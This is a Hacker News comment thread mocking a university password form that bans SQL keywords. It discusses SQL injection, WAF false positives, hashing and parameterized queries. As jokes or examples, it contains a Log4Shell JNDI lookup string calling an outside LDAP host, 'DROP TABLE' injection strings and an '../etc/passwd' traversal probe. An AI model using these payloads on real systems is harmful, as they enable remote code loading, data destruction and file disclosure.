Yup, no CORS either, all protections relied on having proper CSRF-tokens, but with JS access one could read that token as well.

My "hack" was mostly pretty harmless. Just did some layout changes to make my profile cooler. But the door was wide open for anything.

i_k_k
3 replies
23h21m

Well, duh: they needed to make sure to run the script twice.

ht85
2 replies
19h1m

Make it 3 times, you never know how clever those hacker folks could be!

matheusmoreira
1 replies
15h14m

Make it infinite times and stop after the output stabilizes to a constant string!

kevincox
0 replies
5h11m

I think this is actually a correct solution, although not particularly elegant or efficient. As long as the string gets modified whenever it is unsafe, looping until it stabilizes will never return an unsafe string. If it is also true that the modifications only delete characters, then you will eventually arrive at a safe (or empty) string.
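
(A sketch of that fixed-point loop; the banned tokens are placeholders.)

    BANNED = ["<script>", "select", "drop"]

    def sanitize_to_fixed_point(text: str) -> str:
        # Keep stripping banned substrings until a pass changes nothing.
        # Terminates because every pass that changes the string shortens it.
        while True:
            cleaned = text
            for token in BANNED:
                cleaned = cleaned.replace(token, "")
            if cleaned == text:
                return cleaned
            text = cleaned

    print(sanitize_to_fixed_point("<scr<script>ipt>"))  # ""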

alanfranz
2 replies
1d

oldest injection trick ever :-)

sumo86
0 replies
23h19m

WoW

aidenn0
0 replies
15h30m

I actually think it's the second oldest, since the first would be just injecting the string itself.

account-5
1 replies
22h16m

That's easy, they should have just removed the angle brackets, job done.

matsemann
0 replies
10h32m

They allowed some html, though, which is why they didn't safely print your bio as a plain (html escaped) string.

matejn
20 replies
1d3h

Oooh! I put that string there! It was a request by management, and I still don't know why. This site doesn't store any passwords, it's basically just a nice interface to external account management.

I heard a rumour that some legacy apps have weird validation on their login fields, so students wouldn't be able to log in with passwords containing certain strings. But I don't actually know of any examples.

0x00_NULL
13 replies
19h17m

On the contrary, make all of your passwords “DROP TABLE users;”. You’ll quickly sort out which passwords are being handled so insecurely by your vendors. This would mean they both don’t sanitize user input and don’t hash or otherwise obscure your password. They are a menace to society.

jesprenj
11 replies
18h40m

AFAIUC, the reason for the word blacklist here is that some applications sit behind WAFs or similar software that detect malicious requests. Since passwords reach the WAF in plaintext, they get flagged as exploitation attempts if they look like SQL injection, although your parent comment did not give any concrete examples.

nijave
4 replies
17h40m

Surely if you've resorted to blocking random SQL keywords you've already lost. SQL has a pretty big dialect not to mention arbitrary functions and procedures that might exist.

For instance, TRUNCATE isn't even in the list

selcuka
2 replies
17h18m

In the real world, as a developer you can't control what IT uses for a WAF, so you may have to work around it as much as you can.

At a previous job, IT set up a spam filter which used a keyword list (a dumb approach anyway), but it also searched the email headers (not only the body). As a result, we weren't able to receive email if one of the SMTP hops was named, say, smtp.essex.company.com.

jasonjayr
0 replies
15h28m

Ah, a clbuttic mistake!

Too
0 replies
11h8m

If you work as a developer and can’t do your job because of a dumb pattern matching WAF out of your control, you should find yourself a new job or set up a parallel IT infrastructure.

threeseed
0 replies
14h29m

WAFs assume that they are protecting the worst type of systems.

And so they will block requests containing DROP etc even if the systems they are fronting are perfect.

nicolas_t
1 replies
14h26m

Bingo... I hate WAF with a passion, wasted so many hours debugging weird issues when it turned out that they were blocked by some kind of black box WAF the client put in front of their systems.

singingfish
0 replies
10h47m

Thanks,

I just implemented the subset of what we actually needed from a WAF with haproxy, and I'm delighted to say our stuff is extremely effective (as we got a nice flood attack the day after go live), and that it's 10% of the cost, and presumably 10% of the maintenance of the proprietary solution we evaluated.

jamesfinlayson
0 replies
17h29m

Ah, makes sense - someone in a business unit was having a weird failure updating something last week and I couldn't see any failures in the application logs. I looked on their computer and could see that Akamai was blocking the request, and after some trial and error I found that it was because a text field contained "(*" - which it thought looked like SQL.

iforgotpassword
0 replies
18h21m

"malicious" requests in this case. I actually dealt with a contact form of a health insurance company that had something like this going on, but there wasn't any error page showing up, you just got a blank page after submit if something resembled SQL. In my case it was the words "select" and "from" too close to each other in a sentence.

balou23
0 replies
8h39m

Someone said you couldn't put ../../../../etc/passwd here in hackernews due to cloudflare waf. Let's see...

Aeolun
0 replies
13h31m

Oh, yeah. My Infra As Code state was also blocked by the WAF because it looked too much like SQL injection apparently.

LoveMortuus
0 replies
6h24m

Interesting that such situations occur even in academic circles. Especially on the scale of a whole university.

Oh, since it's the University of Ljubljana, lepi pozdravi z Maribora (greetings from Maribor)! ^^

I guess one could also do "DROP TABLE *", should they want to experience what it means when Google removed "Don't be evil" from the preface of their Code of Conduct.

crumpled
1 replies
14h40m

It's just a string on a page? Or does validation actually prevent you?

crumpled
0 replies
14h35m

I think I figured it out. There is no validation. This is just a contact form and someone sees the plaintext password.

aidenn0
1 replies
15h32m

I had an issue with one site where the maximum length on the "create new password" field was longer than the "maxlength" property on the input field for the login form. I couldn't figure out why I could use my password manager's autofill to login (since it ignored the maxlength), but couldn't type or paste my password in.

tareqak
0 replies
13h21m

I think I've run into this issue multiple times but in the context of web-based login vs. logging in from an app. The problem went away when I used a shorter password.

runlaszlorun
0 replies
21h41m

That’s hilarious. And why I love HN.

cbsmith
0 replies
22h2m

I love that you actually posted here.

wkat4242
6 replies
23h6m

Instead of making sure SQL injection is not possible at all by using proper stored procedures and other techniques, they just limit a few keywords and hope hackers don't come up with something that they haven't thought of like some escaping trick.

Yeah that would probably work for a while. Until someone proves it doesn't :P

It's not really rocket science anymore to make sure user input doesn't mix with your SQL. This is not 2005.

And really, if this works in the first place, you're storing the passwords unhashed, which was a dumb thing even in 2005. If the same applies to the username or other user input fields it would make a bit more sense, but passwords should never enter the database like that.

hamburglar
1 replies
21h16m

You realize, don’t you, that the fact that this made the front page tells us that you are explaining things that are obvious to this audience?

wkat4242
0 replies
21h3m

Of course!

I was being sarcastic :) It's ridiculous that this kind of thing still happens.

dmurray
1 replies
19h31m

And really if this works in the first place you're storing the passwords unhashed

Not really, your RDBMS probably supports some hash functions so you could be storing them hashed as "UPDATE USERS SET PASSWORD = SHA2($PASSWORD)" which would be vulnerable to SQL injection yet does not store unhashed passwords.

There are good reasons I'd recommend to do the hashing in the application layer instead, but doing it in the DB (with correctly parameterized queries, of course) is not so terrible.
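
(A minimal sketch of the application-layer version, assuming a made-up users table; the KDF choice and parameters are illustrative, not a recommendation.)

    import hashlib
    import os
    import sqlite3

    def set_password(conn: sqlite3.Connection, user_id: int, password: str) -> None:
        # Hash in the application, so the database only ever sees salt + digest...
        salt = os.urandom(16)
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
        # ...and bind them as parameters rather than splicing them into the SQL.
        conn.execute(
            "UPDATE users SET salt = ?, pw_hash = ? WHERE id = ?",
            (salt, digest, user_id),
        )
        conn.commit()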

wkat4242
0 replies
3h54m

Maybe not terrible but certainly not great. It's best to keep confidential info exposed to as few components as possible.

jrockway
0 replies
22h29m

I think it was early 2005 when I wrote my first database app, and I didn't find it that hard to not mix user data with SQL. (I think I even ran my CGI script in "taint mode". Remember that!?)

MathMonkeyMan
0 replies
21h26m

At work, we were discussing how to serialize some structured data as an HTTP request header value. I reflexively said "ascii subset of JSON without newlines," but that was rejected for some reasons (maybe too much punctuation, verbose for Chinese...). Someone came up with pipe-separated fields, but then that was rejected too. The reason was something like "some customers used to have proxies that would reject any headers that include a pipe character."

My point is that voodoo programming isn't always due to lack of due diligence. It's due to knowing that something went wrong with something in the past, for which there is no evidence, and about which you could do nothing anyway.

My preference is to deploy it anyway, see if it breaks, and if necessary work it out with the customer after the fact. That's unpopular for good and obvious reasons, so no pipe characters.

amne
6 replies
1d4h

still better than "password used by another account"

lucb1e
5 replies
1d3h

Not sure if serious. We need this. If you can guess someone else's password by accident, both of you need a password reset and that password needs to go on the denylist.

Modern advice for strong passwords is having a length requirement and checking the input against a list of known passwords, for example using the HIBP partial hash API. (Any time you see forced expiration or complexity requirements, you're dealing with a legacy/cargocult system.)
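
(The HIBP check can be done without sending the password, or even its full hash, anywhere: hash it with SHA-1, send only the first five hex characters, and compare the returned suffixes locally. The sketch below uses the range endpoint as documented at the time of writing; check the current API docs before relying on it.)

    import hashlib
    import urllib.request

    def password_is_pwned(password: str) -> bool:
        # k-anonymity range query: only the 5-character hash prefix leaves the machine.
        sha1 = hashlib.sha1(password.encode()).hexdigest().upper()
        prefix, suffix = sha1[:5], sha1[5:]
        with urllib.request.urlopen(f"https://api.pwnedpasswords.com/range/{prefix}") as resp:
            body = resp.read().decode()
        # Each response line is "<35-char suffix>:<breach count>".
        return any(line.split(":")[0] == suffix for line in body.splitlines())

    print(password_is_pwned("hunter2"))  # True, unsurprisingly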

dragonmost
3 replies
1d

The server shouldn't even be able to know that a password is being reused, as it should be hashed and salted. There is no situation where this would be acceptable.

Falmarri
2 replies
23h28m

You can hash them without a salt and store them in a set of passwords not associated to user accounts to enforce uniqueness without having to actually know the passwords

duskwuff
1 replies
22h45m

That still introduces a fairly serious vulnerability. The lack of salting on the "password uniqueness" database makes it a juicy target; an attacker with access to the database can attack those passwords, then try the ones which are known to be valid from there against the salted passwords in the user database.

actuallyalys
0 replies
21h14m

I wonder if there’s some way to mitigate this by either only keeping the uniqueness database long enough to identify duplicates and then deleting it or by using this on lower priority systems that people may reuse passwords from for your higher security one. In either case, the small number of bad passwords you would identify that you couldn’t come up with yourself or find on common password lists probably makes this a bad tradeoff.

actuallyalys
0 replies
21h28m

The safe way to do this is to check a password against a list of common passwords, as Jeff Atwood suggests [0] rather than against your other passwords. As other replies point out, you shouldn’t be able to compare your passwords’ plaintext to each other like you’re proposing[1].

[0]: https://blog.codinghorror.com/the-god-login/

[1]: I suppose you could salt and hash the user’s password against every other user’s password and their salt, but if you chose an appropriate password hash function and parameters, that would take infeasibly long.

Edit: I missed that you essentially suggested this already. Sorry about that. However, I think the way Atwood explains it is useful.

ipython
5 replies
1d4h

Phew. They’ll never catch me. My password is

    ${jndi:ldap://hunter2.com/totallylegit}

dmd
4 replies
1d4h

Nope - that's not a valid ldap URL - or even a valid domain, for that matter. Domains can only contain the ASCII letters a-z and the digits 0-9 -- asterisks are not permitted; the only symbol permitted is a hyphen (and it cannot start or end with one).

lucb1e
3 replies
1d3h

It's a log4shell reference

dmd
1 replies
1d3h

But you missed the actual joke.

lucb1e
0 replies
1d3h

Indeed. I wasn't sure if you weren't aware of the log4shell reference or if I was majorly missing your point. The latter, then!

anoopelias
0 replies
1d3h

chasil
5 replies
1d4h

Did someone have a Bobby Tables moment?

https://bobby-tables.com/

In Oracle, you can't use a bind variable in setting a password on an account, so SQL injection is a more significant risk. I wrote some JavaScript and pl/sql to address that.

Falmarri
2 replies
23h30m

Do you mean setting a database user account? As in the oracle user? Why is that exposed over the web?

SoftTalker
1 replies
22h57m

There is/was a school of thought that each user should have their own database account, and the application should connect to the database as that user. The advantage being you can use the database's built-in user and role management and privileges instead of having to invent your own. I have admittedly not seen this done much, but there is a certain appeal to it.

d0gsg0w00f
0 replies
18h47m

I work for a company that is trying to bolt this functionality onto all the AWS database products. At least at the IAM role level.

As it stands now, no human can write to a DB in prod-- only service accounts.

javitury
1 replies
1d4h

I hope that javascript filter runs on the server and not on the web browser...

chasil
0 replies
1d3h

The php runs on the server, and does the same thing.

The JavaScript posts excessive status messages, and only allows a submit when all checks have passed.

turminal
4 replies
1d4h

The funniest part of this is that they don't even check for all of the banned strings.

Source: I'm a student there and tried it out of curiosity.

wmil
2 replies
1d4h

They'll probably use the disclaimer as an excuse to blame you if something breaks.

lucb1e
1 replies
1d3h

"... killed, or worse, expelled!" (https://www.quotes.net/mquote/41411)

Seriously though, I doubt there would be any consequences even if some BOFH tried to blame you

avgcorrection
0 replies
1d3h

I had a pause when I saw that the TLD is `si`. But then I found out that it's just Slovenia.

elevatedastalt
0 replies
18h45m

It's easy to ensure compliance when the risk of non-compliance is getting expelled.

julienreszka
4 replies
1d4h

For people wondering how to do this properly, it's called parameterized queries.

readthenotes1
3 replies
1d4h

You mean storing plain text passwords in a database is safe?

sevensevennine
0 replies
1d4h

Absolutely right-- the warning is only necessary if they're not hashing the password before templating the string prior to storage.

dylan604
0 replies
1d4h

Naturally. You just use a different name for that field than password, and the hackers will never know! /s

da768
0 replies
1d3h

You could still hope it's a WAF issue or that they're hashing passwords through the database query, though both are unlikely.

kazinator
3 replies
1d4h

All five words are also common English words found in any major dictionary. If you're not actually doing anything stupid with the passwords, all you have to do is use that same diagnostic for that situation: "password may not contain dictionary words". Then you don't have a diagnostic which raises red flags.

That the developer is not aware that their diagnostic raises a red flag itself raises a red flag. It doesn't occur to them that a system which issues this diagnostic will be suspected of doing stupid things. That tends to betray a lack of sophistication in the area of security.

ylyn
1 replies
1d3h

That's not a reasonable requirement at all. A common recommendation nowadays is to have passphrases.

kazinator
0 replies
1d

You're right; if the pass phrase has twenty random words, some of which are select or insert, then that's a bad diagnostic.

nephanth
0 replies
1d1h

Except this restriction effectively bans xkcd-style passphrases (4 random dictionary words).

simion314
2 replies
1d4h

A few years ago I was working on an app that used the WordPress API to post stuff. The customers had their own WP installations on various hosting with various "security" features. We had bug reports where posting to the blog failed and produced empty content: these security plugins would scan a big blog post, and if they found something like ".... select <a few paragraphs of text> from ", they would replace that POST parameter with an empty string.

I also saw similar stuff in a customer bug report, where a request from our server containing HTML text inside a JSON field would get injected with some obfuscated JavaScript. I could not be sure if it was a "security" plugin or malware.

bazzargh
1 replies
1d4h

We had one a while back where a small number of requests were failing for a particular set of pages. We first spotted that all the URLs contained 'select' (generally as part of a parameter name, like itemselect), so I went digging for WAF-like filters anywhere in the stack. I found that we had some ancient config in a proxy server, from before we used a commercial WAF, that looked for `SELECT.*UNION` ... flicked back to the URLs and found they'd all also had a parameter like 'company=credit+union'.

Facepalm. We ripped the code out; we had plenty of protection elsewhere.
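
The false positive is easy to reproduce; a toy version of that old rule:

    import re

    # Roughly what the ancient proxy config was doing.
    rule = re.compile(r"SELECT.*UNION", re.IGNORECASE)

    url = "/search?itemselect=1&company=credit+union"
    print(bool(rule.search(url)))  # True: "itemSELECT ... credit UNION"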

simion314
0 replies
1d3h

Yeah, the hard part is when you do not control the server, so you need to tell your customer to contact their hosting provider and fix the issue. Sometimes we got the ID of the security rule that triggered the issue, but not all the time.

These security products feel like a scam.

kstrauser
2 replies
20h52m

I once couldn't register for a website because my last name contained the word "user". Yes, it does. Given the choice between changing my name, lying about my name, or signing up with a competitor instead, I chose the dignified option.

buggy6257
1 replies
20h46m

So… what’s your new last name?

kstrauser
0 replies
20h32m

Mud.

walrus01
1 replies
1d4h

Until very recently, the online banking password for a major (big-5) Canadian bank couldn't be longer than 9 characters or contain ANY special punctuation characters from the ASCII code set. It was very clear that they were storing them in plaintext in a database on some archaic mainframe somewhere.

jesprenj
0 replies
1d3h

A Slovenian bank (NKBM) only permits 6-digit passwords and nothing else -- probably so that users can dial them via DTMF when on the phone.

throwawaaarrgh
1 replies
20h50m

Worked on a system like this once. Nobody wanted to fix the actual backend problem so this limitation was a requirement. But I figured that advertising these little "quirks" in the login flow would give hackers ideas, so instead I just added a function to transform the "bad input" into an alternative set of characters that wouldn't have a negative effect on upstream. Since you couldn't view the saved password, nobody realized they were being transformed behind the scenes. Stupid yet effective.
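
Something in the spirit of that transform, purely illustrative (the real mapping was of course different):

    # Map characters the backend chokes on to lookalikes it accepts. Applied
    # identically when setting and when checking the password, so users never
    # notice the difference.
    SUBSTITUTIONS = str.maketrans({
        "'": "\u2019",   # curly apostrophe instead of a single quote
        ";": "\uff1b",   # fullwidth semicolon
        "-": "\u2010",   # hyphen lookalike, which defuses "--" comments
    })

    def defang(password: str) -> str:
        return password.translate(SUBSTITUTIONS)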

knallfrosch
0 replies
20h6m

Until someone builds out your transform

pbhjpbhj
1 replies
1d3h

Perhaps their system is fine but this is a way to filter out people who are likely to try breaching the Uni security, so they know who to watch? Or there's a CTF challenge for local security agencies...

nephanth
0 replies
1d1h

A more efficient way to do that would be to flag people doing that to admins, not to tell them not to do it

donohoe
1 replies
1d3h

Would be better if they provided a drop-down list of safe passwords to use. A pre-defined choice of 12 should be enough.

pixl97
0 replies
2h51m

Heh, reminds me of the kid-safe chats that used to exist where you could only select from a limited dictionary of words to make sentences. People still found a way to say some pretty terrible things.

dathinab
1 replies
1d3h

the only situation where such rules can matter is if you already _massively_ messed up security

(the most fundamental rule of handling passwords is to never store them anywhere, and never log them either; they should go straight to the hashing function and nowhere else)

strken
0 replies
19h4m

It matters if your stupid WAF blocks anything that looks like SQL.

avgcorrection
1 replies
1d4h

I want more innovation in the password requirement genre:

Your password must be a valid SQL, Java, Go, or C++ string. Or a haiku about grocery shopping. This way it won’t look like a password in case we leak it.

wongarsu
0 replies
1d3h

It's pretty common to force usernames to be valid C or Pascal identifiers (only letters, digits, and underscores; the first character can't be a digit). So why not extend the reasoning to passwords? /s

Syzygies
1 replies
22h29m

A legendary xkcd: "Did you really name your son Robert'); DROP TABLE Students;-- ?"

https://xkcd.com/327/

danesparza
0 replies
21h47m

Awww ... little Bobby tables!

OscarCunningham
1 replies
1d3h

I've heard people being told 'sanitize your inputs!' too many times. The advice should be 'escape your outputs!'.
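
That is: keep what the user typed and escape it for whichever sink it is headed to (bind parameters for SQL, entity escaping for HTML, and so on). A tiny example of the HTML case:

    import html

    comment = "<script>alert('hi')</script>"   # store this exactly as typed
    rendered = html.escape(comment)            # escape only when emitting HTML
    # rendered == "&lt;script&gt;alert(&#x27;hi&#x27;)&lt;/script&gt;"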

JanisErdmanis
0 replies
1d3h

Also, don’t use eval on your inputs, but instead make proper endpoints.

wly_cdgr
0 replies
19h55m

I don't see any downside here. It's just another layer of protection. So what if it's not sufficient?

vldr
0 replies
9h50m

"extra security is good, though"

https://xkcd.com/463/

(no not the bobby tables xkcd)

tkems
0 replies
22h52m

This sounds like a hold-over from an older system. I've heard stories of certain universities and banks using old mainframe systems for central authentication. In one instance I've heard that passwords were stored in plaintext and truncated to 8 characters, uppercase only.

The main reason, that I've heard at least, for not upgrading these systems is cost and complexity. Why upgrade a system that is working for $$$$ when we can restrict passwords and add some basic 'security' for $.

seydor
0 replies
23h18m

drop database users; truncate table posts;

rco8786
0 replies
19h19m

Makes me ponder the question - what's the worst you could do to a SQL database without using those strings (at least not directly)?

They don't prohibit semicolons, so there's still some potential here.

pierrekin
0 replies
20h3m

I was made to do this at work also. The reasoning went something like this:

Yes, of course we need to properly escape all strings that we render / use parameterised queries to avoid injection attacks; however, we also need defense in depth, so all fields need to reject anything that looks like SQL or HTML.

It was easier to just add this than to push back. Sigh.

neom
0 replies
22h50m

For those who don't feel like clicking around to learn more: It's the student identity management portal for the University of Ljubljana in Slovenia.

moogly
0 replies
1d4h

That's fine. I'll just use `truncate` instead.

jrockway
0 replies
22h30m

Good thing my password is ROLLBACK.

josephcsible
0 replies
1d1h

Apparently someone read https://thedailywtf.com/articles/Injection_Rejection and didn't realize that it wasn't a best practice.

dboreham
0 replies
23h13m

And definitely don't register the vanity vehicle license plate "NULL".

cco
0 replies
20h35m

I work at an auth company (Stytch) and sometimes developers ask me about input restrictions on passwords in our API.

I've had folks ask me if we support emoji, "code/SQL" like in this example, Chinese characters etc.

So fun to see and hear from folks on all sorts of stacks, especially legacy systems where layers of cruft have accreted over time to produce Byzantine requirements like this.

captain_bender
0 replies
15h31m

There are a number of South Korean websites that only allow ‘!, @, #, $, %, ^, &, *’ as special characters. They still force people to include those characters, and the 'maximum' password length is like 20, sometimes 12.

butz
0 replies
2h20m

They should add a list of passwords already used, you know, for security.

bitwize
0 replies
22h0m

Bobby Tables: "Drat, foiled again!"

beardyw
0 replies
1d2h

This admits they are updating the database wrong and storing the password wrong.

amluto
0 replies
1d

Off the top of my head, they forgot MERGE INTO, which is supported by several major databases. Also ALTER, GRANT, SET, and probably many others.

This particular variant of defense in depth is also rather missing the point: this field is a password. The question isn’t “did everyone remember to properly escape the password or properly use parameter binding” — the question is “did everyone remember not to store the plaintext password?” By the time someone does:

    Execute("UPDATE xyz SET abc = ?", password)
Or however your database API spells it, you have already messed up massively.
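
A minimal sketch of the order of operations being argued for here (scrypt via the standard library; parameters illustrative only):

    import hashlib, os

    def hash_password(password: str) -> str:
        salt = os.urandom(16)
        digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
        return salt.hex() + ":" + digest.hex()

    def store(cursor, user_id, password):
        # Both layers: parameter binding *and* no plaintext anywhere near SQL.
        cursor.execute("UPDATE xyz SET abc = ? WHERE id = ?",
                       (hash_password(password), user_id))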

KevinMS
0 replies
1d2h

maybe they just got sick of script kiddies bloating their users table with lame hacking attempts. This might discourage them.

Hippocrates
0 replies
19h25m

If I were an adversary this would certainly pique my interest.